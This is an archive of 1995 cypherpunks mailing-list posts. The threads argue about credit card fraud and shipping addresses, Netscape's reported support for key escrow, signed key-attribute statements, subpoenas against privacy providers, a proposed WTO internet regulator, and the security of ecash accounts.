In-Reply-To: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
Message-ID:

On Thu, 30 Nov 1995, E. ALLEN SMITH wrote:

> However, if you have optional linking of ID and name, shippers will only
> ship to keys with such attributes. Because just ID and address, it could
> be a "hit and run" type attack shipped to a safe maildrop.
> ---------------------------------
> If the transaction is via a Credit Card, it's the card issuer's
> liability (and responsibility to determine creditworthiness), unless I'm badly
> mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
> physical dollars when ecash is presented to them. What's the risk in either
> case?

Credit card fraud -- ie I've snarfed someone's card number and they haven't figured it out yet. Cardholder's liability is $50 (I think). Depending on the situation (if it's a card-is-physically-present transaction or a not-present) the liability falls to either the bank or the merchant. A "proof of address" is a darn good way to reduce (not prevent, reduce) that sort of fraud.

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072
Visit my home page at http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From jlasser at rwd.goucher.edu Thu Nov 30 10:38:46 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 1 Dec 1995 02:38:46 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID:

On Tue, 28 Nov 1995, James A. Donald wrote:

> >Not if you're encrypting a Credit Card transaction to ship physical
> >goods. In that case, I'm going to certainly want to link a key ID to a
> >physical body (or at least address) if I'm the seller, so as to limit
> >liability as best I can.
>
> Not at all: All you need to do is be able to prove you shipped
> to the address requested: You do not have to know what the
> relationship is between the address requested and identity
> paying you to ship.

That's if you're accusing the merchant of fraud. I'm positing someone's using a stolen credit card number. (Yes, these will still exist for at least a while after e-cash becomes commonplace).
If I'm a merchant, I'm going to really want (if I know it's possible) to ship only to what's been "the address on the card" (or, in reality, in the database under the card's number) so that it's harder (not impossible, harder) for people to defraud me.

> > However, if you have optional linking of ID and name, shippers will only
> > ship to keys with such attributes. Because just ID and address, it could
> > be a "hit and run" type attack shipped to a safe maildrop.
>
> This argument makes no sense at all: I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

No; you're going to steal from your enemies by having them ship things to you without payment.

Note that in an ecash economy, this isn't a problem. The original post was about the transition between the current economy and a "cypherpunks" economy, during which I suggested that encryption would be used to protect credit card numbers (and be a "proof of identity" -- which I was claiming wouldn't work without ecash (proof of non-fraud payment))

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072
Visit my home page at http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From attila at primenet.com Thu Nov 30 10:46:01 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 02:46:01 +0800
Subject: The future will be easy to use
In-Reply-To: <9511300751.ZM7630@morgan.com>
Message-ID:

On Thu, 30 Nov 1995, P. Rajaram wrote:

> On Nov 29, 10:25pm, attila wrote:
> > Subject: Re: The future will be easy to use
> > OK, I have not seen it (like I said, I will get it) or read ipsec.
> >
> > However, despite the group ego, Sun _does_ listen and Sun does wish to
> > be the leader. If the rest of ipsec group has a specific list, maybe it
> > needs to presented higher up the pole.
>
> There are different groups within Sun.
> The people pushing SKIP don't talk much with the group building IPv6.
>

that's a given. NIBM (not invented by ME) syndrome. That is what needs to stop.

however, Sun has been playing the game recently of introducing an early product, then coming on with a more standard product.

that does not change the fact the two groups need to talk, and someone needs to coordinate resources. Nothing wrong if SKIP shakes out a few details as they implement, but then it needs to go to the standards.

From perry at piermont.com Thu Nov 30 10:49:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 1 Dec 1995 02:49:07 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301752.MAA06161@jekyll.piermont.com>

Jeff Weinstein writes:
> sameer wrote:
> >
> > http://www.cnet.com/Central/News/govt.html
> >
> > Bad. Very Bad. And I was almost starting to like Netscape.
>
> Please don't give up on us yet. All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.

Jeff, I'll be blunt.

I'm never going to use Netscape again if it turns out to be true. Sure Mosaic bites, but who cares -- with enough work we can make it or something else compete with your product if need be, and I bet that you guys can't keep up with five hundred angry hackers. I'll also happily run a campaign to convince everyone else on the internet that you guys are helping to violate their privacy, because you would be.

Tell Jim Clark that if he goes through with it he has something far worse to lose than his friends in the government -- the billion he just got his hands on. Tell him that if he is being misquoted he'd better make sure that retractions get printed and fast.

If you don't want "Netscape Inside" to be treated as a warning label, you guys will reject escrow as any other ethical company would -- or else.
Perry

From perry at piermont.com Thu Nov 30 10:54:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 1 Dec 1995 02:54:32 +0800
Subject: Netscape gives in to key escrow
In-Reply-To:
Message-ID: <199511301758.MAA06181@jekyll.piermont.com>

Jay Holovacs writes:
> On Thu, 30 Nov 1995, Timothy C. May wrote:
>
> >
> > Can Netscape continue to prosper? This latest issue won't kill it,
>
> I suspect this will unfortunately help. Stockholders are interested in
> profits, not principles.

Netscape is currently trading somewhere like 7000 times earnings. What profits are you talking about, precisely?

Perry

From fstuart at vetmed.auburn.edu Thu Nov 30 10:55:30 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Fri, 1 Dec 1995 02:55:30 +0800
Subject: [NOISE] Re: cypherpunks at ietf
Message-ID: <199511301759.LAA18735@snoopy.vetmed.auburn.edu>

[...]
>THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.
>
>THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
>TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:
>
> 1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
> 2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
> 3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
> 4. DOWNLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
> 5. HOOK ON-LINE TO VIDEO & AUDIO

  6. View text in lower case. :>

[...]

                              | (Douglas) Hofstadter's Law:
Frank Stuart                  | It always takes longer than you expect, even
fstuart at vetmed.auburn.edu  | when you take into account Hofstadter's Law.

From rsalz at osf.org Thu Nov 30 11:00:33 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 1 Dec 1995 03:00:33 +0800
Subject: Netscape gives in to key escrow
Message-ID: <9511301801.AA19366@sulphur.osf.org>

> Absent such clarification, we must assume he considers the
> press reports of what he said to be reasonably accurate.

Speaking for myself, I wouldn't feel comfortable assuming that Clark's priorities vis-a-vis correcting a handful of misquotes were as high as I might want them to be.
So I wouldn't take this position (fun and full of righteous wrath though it may be). Instead I'd be optimistic and say "he hasn't gotten around to it yet." Just as I figure Elvis will eventually tell all those tabloids that he and JFK were playing cards with Hoffa in Bimini all these many years.

/r$

From opsan at gnn.com Thu Nov 30 11:21:07 1995
From: opsan at gnn.com (Michael Coates)
Date: Fri, 1 Dec 1995 03:21:07 +0800
Subject: cypherpunks at ietf
Message-ID: <199511301820.NAA06599@mail-e1a.gnn.com>

>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee: Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarrass himself. Don't they have karaoke bars for that sort of thing?

From attila at primenet.com Thu Nov 30 11:21:10 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 03:21:10 +0800
Subject: SUN, UNIX, et al versus MS standards
In-Reply-To: <199511301517.JAA14087@spirit.sctc.com>
Message-ID:

my only comment on Sun's non-portable software is that it **used-to-be** a case of excessive Berzerkely attitude. Solaris is an effort, and a very credible effort to meet industry and consumer standards. The code is compatible to Sys V R4, and on x86 implementations will execute Sys V R4 binaries, as well as SCO binaries which opens that whole set of markets (software availability).

at the Solaris 2.1 and 2.2 levels, Sparc Solaris and X86 Solaris were not even compatible to each other. I just took 200K+ lines of code from a Sys V package and ported it to both Sparc and X86 Solaris 2.4 --perfect.
The code also had defines for 4.2+ BSD --those also compiled. Take your pick. Sun got the message on standards; their response was to meet both; and, they have done a good job of it.

Secondly, there is no such thing as bug-free code --that's like free-lunch and it's all relevant. Which would you rather have? patches available on the net, or be forced to upgrade to new bugs with MS plus a few more overkill features.

Again, my point is: why bad mouth Sun? This is what has fractured UNIX in the market place and gives the MS assholes the ability to not only stomp UNIX with reviews which always ask "...which flavour of UNIX is it this month?" but, even worse, it gives Gates an opportunity to set YET ANOTHER **PROPRIETARY** MS STANDARD --that does not run securely with the mainline.

Do you wish to give Microsoft, whose intentions have never wavered from getting a piece of every transaction in the world, **complete** control over everything? on every desktop?

In other words, do you want to see Microsoft, and possibly only Microsoft/Intel, in the marketplace. Network managers complained about the Ray Noorda cult, but wait until everybody is forced to join the Bill Gates cult.

SUN is not the enemy; MS is. Do you wish to live with MS who, according to the head cultist, **never** issues a maintenance release since the software does not have bugs. Just updates, **expensive** updates, which fix some bugs, add a few overkill features, and introduce new bugs.

Is there any really good software for **applications** on UNIX at even close to windows compatible prices --let alone the wealth of material available. Sure WABI gets the main productivity pieces, but PagerMaker and Corel are frozen at Version 5 for WABI.

Personally, I use OS/2 as the front end to my Suns; OS/2 is likewise frozen at W3.1 level software --but at least WinOS2 does not crash my entire system or network.
I want some of the features in the W95 versions of Corel and PageMaker, such as HTML --they will never be made available for either OS/2 or UNIX.

In other words, we need to stop bitching, and start supporting the alternative systems --constructively. It all comes back to software, and even us techno-freaks, or whatever we are with the long hair blowing all over, need to think about the people who want a simple answer and MS gives the glitter --if we do not help sustain the alternatives, we will not even have the luxury of decent hardware. Even GNU has a W95 and an NT **full pack**.

From cme at TIS.COM Thu Nov 30 11:23:50 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 03:23:50 +0800
Subject: The future will be easy to use
In-Reply-To:
Message-ID: <9511301819.AA11933@tis.com>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 12:39:50 -0500 (EST)
>From: Jon Lasser
> I'm positing someone's
>using a stolen credit card number. [...] If I'm a merchant, I'm
>going to really want (if I know it's possible) to ship only to what's
>been "the address on the card" (or, in reality, in the database under the
>card's number) so that it's harder (not impossible, harder) for people to
>defraud me.

I'm not sure that's the reason, but there are merchants who insist on shipping to the card's billing address. This happens to me when I'm using a credit card by phone, so the merchant has no signature on file. For lack of that proof that I'm me (as opposed to some inmate in a local prison (actual case I heard about)), if they ship goods to the same address that writes the actual check for the goods, there's added safety.

For a world with my non-certificates, this is achieved by a pair of attribute statements:

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank
- -----BEGIN PGP SIGNATURE-----
[...] signature with First Security Bank's key (bc2cb0...)
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive packages (especially UPS and FedEx) at:
  Carl Ellison
  c/o Trusted Information Systems
  3060 Washington Road
  Glenwood MD 21738
  (301) 854-6889
- -----BEGIN PGP SIGNATURE-----
[...] signature with my key (e05c60...)
- -----END PGP SIGNATURE-----

The first gives the necessary hook for the merchant to establish that key e05c6... has money to spend, if the merchant feels the need to check. The second establishes a shipping address for that key.

Note that the word "I" in the second attribute statement means "the person who knows how to make the attached signature with key (e05c60...)" rather than "Carl Ellison" (although, in this case, they're the same).

The shipping address could be anonymous:

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: I receive USPS packages at:
  P.O. Box 360
  Glenwood MD 21738
- -----BEGIN PGP SIGNATURE-----
[...] signature with my key (e05c60...)
- -----END PGP SIGNATURE-----

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML31ZFQXJENzYr45AQHk1QQAplkBXXZ+tSiBA2B/0FbJtFkYabNJcC7T
lkDEG/jZVANhonX5KKRgwKwzg1cfMCAlbbe0s+3HLTMg5yj9Fw4UD/U0mgZ31HGo
16iqbOqoVpknI5qSHVH/p2QMKHb3N1wKOEH3VJc21mkO+5W77p0mXywvW5zJrRHR
qllQdZ3Xde0=
=UU9f
-----END PGP SIGNATURE-----

BTW -- I don't have a PO Box at Glenwood.
(cme)

From opsan at gnn.com Thu Nov 30 11:26:38 1995
From: opsan at gnn.com (Michael Coates)
Date: Fri, 1 Dec 1995 03:26:38 +0800
Subject: cypherpunks at ietf
Message-ID: <199511301821.NAA17770@mail-e1a.gnn.com>

>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee: Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarrass himself. Don't they have karaoke bars for that sort of thing?

From EALLENSMITH at ocelot.Rutgers.EDU Thu Nov 30 11:27:38 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 1 Dec 1995 03:27:38 +0800
Subject: Attribute-testimony example (was Re: The future will be easy touse)
Message-ID: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>

From: IN%"cme at TIS.COM" "Carl Ellison" 30-NOV-1995 12:34:35.18

Once an element of that set is identified, it can be assigned a codeword (to make parsing easier).
----------
How about an email address? Or a URL? Those can be autodetected easily enough. Plus, the email one could be used to automatically use the appropriate key if reading something from a particular address (whether for decryption or for signature verification). If there are more than one with that address, try all of them and if one turns up looking right (looks like email headers, for instance) use that decryption. That last is even easier with the signature verification, and that can show up the user-specified portion of the field so as to remind you who's sent the message.

Sorry if this has been thought of (and suggested) before... it is kind of obvious.
-Allen

From attila at primenet.com Thu Nov 30 11:45:15 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 03:45:15 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511301704.JAA23295@infinity.c2.org>
Message-ID:

On Thu, 30 Nov 1995, sameer wrote:

> > "finessing" laws will become more important. In short, they WILL have
> > a subpoena--then what?
>
> Then they'll find out that I don't have any information that
> could help them, anyway.
>
> sameer
>

yes, and that is where the absurdity of American law enters in, they **charge** you with conspiracy! --or destroying evidence of a crime (by failing to keep logs) --or even better, aiding and abetting the commission of a crime as part of the "chain" of the crime.

and, you better believe they do whatever they want. and do not ignore RICO, because if they "allege" there were six or more conspirators, or participants, they are starting to use RICO --and you can go away for life without parole for even a simple "crime."

let me put it this way --been there, done that.

however, screw'm, if we don't put our asses on the line, not only will America in general not have freedom of speech, but we will not either. I do not necessarily condone the militias, but I certainly will not interfere with their rights

it may not be too long before the words of Thomas Jefferson may ring true: the purpose of the militia [a citizens' militia] is to, God forbid, overthrow a state which has become tyrannical.

**** ****
the government who fears weapons in the hands of its citizens, should!
**** ****

From rpandya at netcom.com Thu Nov 30 12:01:16 1995
From: rpandya at netcom.com (Ravi Pandya)
Date: Fri, 1 Dec 1995 04:01:16 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511301927.LAA12863@netmanage.com>

If you're looking for an alternative Web browser for Windows, we just made ours available for free at www.netmanage.com.
It's fast and reliable, and supports HTML 3.0, inline video, software distribution, VRML (NT version), Real Audio, TrueSpeech, etc.

Ravi

**** Home of Chameleon TCP/IP Applications for Windows and ****
**** ECCO Personal & Group Information Manager for Windows ****
Ravi Pandya
Director of ECCO Engineering
NetManage Inc
2340 130th Avenue NE
Bellevue, WA 98005
206 867 3722 voice
206 885 0127 fax
ravip at netmanage.com

From cme at TIS.COM Thu Nov 30 12:03:51 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 04:03:51 +0800
Subject: Attribute-testimony example (was Re: The future will be easy touse)
In-Reply-To: <01HY987RZFD48WYZNO@mbcl.rutgers.edu>
Message-ID: <9511301916.AA17069@tis.com>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 30 Nov 1995 13:33 EDT
>From: "E. ALLEN SMITH"

>Once an element of that set is identified, it can be assigned a codeword
>(to make parsing easier).
>----------
> How about an email address? Or a URL?

In this case, I was talking about an abbreviation for an attribute rather than for a person -- e.g., "checking-account: ," standing, for example, for "The person (entity) capable of signing with the signed-key identified above is authorized to withdraw money from checking account number at ."

However, in offline mail I just had this interchange:

>>Date: Thu, 30 Nov 1995 12:47:28 -0500 (EST)
>>From: Jon Lasser
>
>>Maybe it is just out of habit. But there's another aspect, not looking
>>at other people, but looking at oneself:
>>
>>"This is _my_ key."
>>
>>"But my name isn't on the key."
>>
>>"The key says I belong to it."
>>
>>"Hey! I'm not just a number!"
>
>I think you're exactly right here. That's the problem.
>
>Perhaps we need to include the person's name in the keyID.
>
>So instead of:
>
>Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
>
>we could use:
>
>Signed-Key-ID: Carl Ellison (e05c601c4ec4af3aeb54a53171ed65da)
>

or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison)

to follow the SMTP example, or

Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da (Carl Ellison )

to follow the PGP example.

In this case, the text attached to the key is optional -- but there for the people who feel attached to their names. It's left off (or replaced with a handle) for folks who want anonymity.

The fact remains that the key is the source of authority here. The name acquires validity from the key, not the other way around, and that might upset some people who bother to think about it. However, those who prefer to think the name is important can view the key hash as an added field making the name unique -- with the extra added bonus of being tied strongly to a public key.

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML4CoVQXJENzYr45AQFvJQQAszQbHHIXlOVFpdBv3K/J6f3FmCBoSvhX
Fpy9T0OJAH2pndzH1cZLVTQzS+j/p4tY5P6YAlF+VS047T6jQqF31Kn1fIUlEjzw
0/t/W+7BQ+IktrrNtyJfEx5rFYKUg6rViTg3UF+knocBIMTRfm0EbuMkv7hCN5Ho
iE0n9FZ+XIc=
=e+iE
-----END PGP SIGNATURE-----

From edge at got.net Thu Nov 30 12:16:42 1995
From: edge at got.net (Jay Campbell)
Date: Fri, 1 Dec 1995 04:16:42 +0800
Subject: "Got a subpoena?"
Message-ID: <199511302056.MAA07241@you.got.net>

>> "finessing" laws will become more important. In short, they WILL have
>> a subpoena--then what?
>
> Then they'll find out that I don't have any information that
>could help them, anyway.
What about a court order to (a) start comprehensive logging, and (b) not tell anyone under penalty of ______ .

-- Jay Campbell edge at got.net - Operations Manager
-=-=-=-=-=-=- Sense Networking, Santa Cruz Node
Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89
"On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn."

From jya at pipeline.com Thu Nov 30 12:20:59 1995
From: jya at pipeline.com (John Young)
Date: Fri, 1 Dec 1995 04:20:59 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199511301940.OAA25768@pipe9.nyc.pipeline.com>

Picking up on Tim's and Atilla's comments on Netscape, GAK, a WTO czar and government regulation of security on the Net:

Jim Clark's speech was probably a trial balloon, to see what the reaction would be. Remember that the NIST conference on KE is December 5.

It would make sense for the corporations to welcome application of police power to handle threats to public order, in cyberworld like the other. That way they reduce culpability for failures of their private security systems, as they do on private real estate property.

Key escrow requires someplace for the buck to stop beyond several private pitstops, and that is usually Uncle Sugar when no other party has the resources to withstand sustained, substantial, culture-wide risk -- as, say, in the financial realm.

Internationally, the same need exists. Probably the corporations would like to work in concert with governments on this, so no single firm, or nation, gets stigmatized, or wounded and prey to vultures -- as Netscape was with the brute hack, and as Microsoft and others have been with other attacks on their lightly guarded property, or as the US might be if it does not work out international agreements.

Moreover, it has been noted here that government contracts are crucial for a new company -- for testing, for credibility, for prestige.
All the major players already have such vital contracts -- indeed most would not have thrived without them -- so why would Netscape, and its investors, not want them too?

It's possible that Netscape was selected to sound off on KE to see if it could play with the Big Boys -- take the heat, pass initiation, qualify for the Bohemian Grove bear hugs of assured stability, growth and profits.

Could be, though, that after getting stable R/E for his backers, Jim will be confident enough to join Pixar in that rhumba risk of mercurial, evanescent mass-marketers. That's not to be believed now at 7,000 times earnings.

From hallam at w3.org Thu Nov 30 12:22:42 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 1 Dec 1995 04:22:42 +0800
Subject: WTO an even worse possibility as Inet regulator
In-Reply-To:
Message-ID: <9511301947.AA05400@zorch.w3.org>

> a very credible white paper is circulating for the WTO to establish an
>internet CZAR to regulate the Internet and level the playing field world
>wide.
> personally, the Feds and the FCC are bad enough --now they want to
>have a **global** bureaucracy play god -???

Depends on what the role of the Czar is. If it is to stop silliness like border disputes and keep national governments out of the loop then it could be a good thing. If they want to regulate it is a bad thing.

WTO is mainly known for the GATT which they brokered. This is basically an agreement amongst national governments to be "hands off" in their tariff regulations.

There is the potential for governments to regulate the Internet. It is in everyone's interest to keep hands off but if one starts to regulate then it is in others interests to regulate. The general solution to prisoners dilemma games is to form some type of alliance. It is not possible to form alliances in classical prisoners dilemmas since they are restricted to a single dilemma at a time. Governments are involved with multiple dilemmas and hence have multiple agreements.
The main reason to keep a treaty is that the credibility of government depends on keeping treaties. Thus a treaty can solve a prisoners dilemma problem since the gain from breaking one treaty is more than offset by the potential loss through other sides abrogating other treaties.

I suspect that the role of an Internet Czar would be mainly ensuring that fat Internet pipes arrived throughout the third world. George Sorros has been very active in this area, he paid for much of the infrastructure development into Eastern Europe. If we could persuade Bill Gates that his mission in life was to cable Africa to the Internet somehow we might have the whole planet online before 2000.

I would not be too worried about WTO banning crypto or attempting looney tune ideas like insisting on OSI protocols. The UN generally does some very worthwhile work in allocating radio frequencies and such like and has done so for many years without problems. They allocate areas of the Clarke belt for satellites and do all sorts of mundane tasks.

One of the odd things about power is that the larger the scale the more mundane the decisions. At the local level councillors decide to build or close schools and hospitals. At the global level negotiations are held on the size of holes in fishing nets and the exact specifications of ball bearings.

If people want to see the Federal government weakened in power the only way to do so is to make it cede power both upwards and downwards. A national speed limit may be a bad idea (I personally think what was wrong was 55mph) but national standard roadsigns is a good idea. International standard roadsigns are a better idea still.

Phill.

From sameer at c2.org Thu Nov 30 12:28:04 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 04:28:04 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511302056.MAA07241@you.got.net>
Message-ID: <199511301946.LAA12448@infinity.c2.org>

>
> What about a court order to (a) start comprehensive logging, and (b) not
> tell anyone under penalty of ______ .

Aren't court orders part of the public record? I don't quite know how this would work. I don't think they can keep me from telling people that I've started comprehensive logging, or at least keep it from being found out. (Legally, that is. I'm sure they could always use an approach like threatening to audit me every year, threatening my family, etc.)

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
The Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest") sameer at c2.org

From attila at primenet.com Thu Nov 30 12:32:02 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 04:32:02 +0800
Subject: WTO an even worse possibility as Inet regulator
Message-ID:

based on an article from the (London) Financial Times [available from John Young at jya at pipeline.com with subject line WAY_lad], a very credible white paper is circulating for the WTO to establish an internet CZAR to regulate the Internet and level the playing field world wide.

personally, the Feds and the FCC are bad enough --now they want to have a **global** bureaucracy play god -???

are we ready to go back to UUCP?

From mark at unicorn.com Thu Nov 30 12:44:42 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 1 Dec 1995 04:44:42 +0800
Subject: Credit card theft Re: The future will be easy to use
Message-ID:

On Thu, 30 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> What if it's an ecash password getting stolen? Who's liable? (lemme
> guess, your money's gone, tough luck!)

From what I remember of the contract, that's true, the bank appear to take no liability for ecash (check the WWW page for the real details). As I'm not likely to have more than about $ 50 of ecash at any time, I'm not *that* concerned about it.
Big users could transfer payments back into their dollar account ASAP to avoid most of these problems, just keeping enough in the ecash account to make any payments that may be required. It's not really any worse than physical cash, as long as the software is reliable, which it appears to be (I've lost payments in the past, but cancelling them has always worked to get the money back).

> Disclaimer: I don't have a marktwain account at the moment, so I can't
> say a thing about the security of the system. I wish them the absolute best
> of luck.

I do, and yes, from conversations with them it appears that if someone gets your secret key and password they can clear out all the money from your ecash account. This is potentially a real problem for shops, which have to have a secret key file on the machine they run from.

Currently this even applies to shops that only *accept* ecash, though there may be an accept-only server out sometime, and I found a way to delete the secret key itself from the file and still have it work (I forget the exact details, you basically zero 256 bytes of the file that contain the key, which appears to be 768-bits according to the debug output, so I don't know what the extra bits are used for).

Shops that pay out need to have an *unencrypted* secret key on the server, which is scary, but there's not much you can do about it if you're running on an insecure server... The only way around it that I can see would be to withdraw ecash using a secure machine and upload it to your server, so that the shop could make payments until the ecash supply was depleted and then you'd manually have to withdraw more. Then if someone broke into your account they'd get the ecash, but not the key, and you could limit your exposure to the amount you uploaded at any one time. I'll probably be doing that once the check I mailed over gets into my ecash account.
This is strictly my understanding of the system based on what I've been told, so hopefully if I'm wrong then someone from DigiCash will correct me.

Mark

From tcmay at got.net Thu Nov 30 12:45:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 04:45:27 +0800
Subject: Netscape gives in to key escrow
Message-ID:

At 7:26 PM 11/30/95, Ravi Pandya wrote:
>If you're looking for an alternative Web browser for Windows, we just made
>ours available for free at www.netmanage.com. It's fast and reliable, and
>supports HTML 3.0, inline video, software distribution, VRML (NT version),
>Real Audio, TrueSpeech, etc.

This shows the price Netscape could pay for taking a pro-surveillance, anti-privacy stance. Various alternatives to Netscape exist (even on the Mac), despite attempts to make "Netscape-enhanced-encoding" (or whatever it's called) the standard. I expect alternative browsers will catch up fairly quickly.

(As an aside, and based on my past experiences at Intel during its rapid-growth phase, it may be tough for Netscape to keep people motivated and focused on development, what with all the "distractions" of a stock price of $140 when it was expected to go public at $14. CNBC reported yesterday that several _secretaries_ at Netscape have cashed in $600K stock options....I can imagine a lot of folks are eager to leave to enjoy their new wealth, but will stick around for the future stock options. This becomes a real drag on productivity, based on my experiences and those of my friends at various other start up companies.)

I also expect that this pro-surveillance, anti-privacy "stumble" by Jim Clark will either be quickly "clarified" (but perhaps nothing really changed), or Netscape will suffer a black eye in public relations, with many "Cypherpunk"-type people adopting a "Just Say No to Netscape!" stance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hallam at w3.org Thu Nov 30 12:45:49 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 1 Dec 1995 04:45:49 +0800
Subject: Netscape, Corporations, and GAK Support
In-Reply-To: <199511301940.OAA25768@pipe9.nyc.pipeline.com>
Message-ID: <9511302008.AA05390@zorch.w3.org>

Folks, lay off Netscape on this one. _EVERYONE_ is doing Terissa for the feds to use themselves. There are reporting requirements (FOI) which most people on this list seem to enjoy which make the privacy issue moot. There are other people who do not want to have non escrowed data flowing over their internal nets, nuclear installations etc.

When I was involved in the site security area there was no way I would allow messages to be bouncing round the internal net which I could not read. They might well be from trojan horses planted inside the net sending data out.

Key escrow is not bad in itself. It is the idea that individuals be forced to use it for private conversations that is the bad idea.

If people want to argue "make the technology available and it will be abused" then let them. Just remember that we normally argue the other side of the case.

Phill

From tedwards at Glue.umd.edu Thu Nov 30 12:52:05 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Fri, 1 Dec 1995 04:52:05 +0800
Subject: whither NetBill? (micropayments)
Message-ID:

NetBill (http://www.ini.cmu.edu/netbill/) appears to be a great way for implementing micropayments. Does anyone know what the deal is, or did Visa sign on just to keep it from happening?
-Thomas

From attila at primenet.com Thu Nov 30 13:33:20 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 05:33:20 +0800
Subject: WTO an even worse possibility as Inet regulator
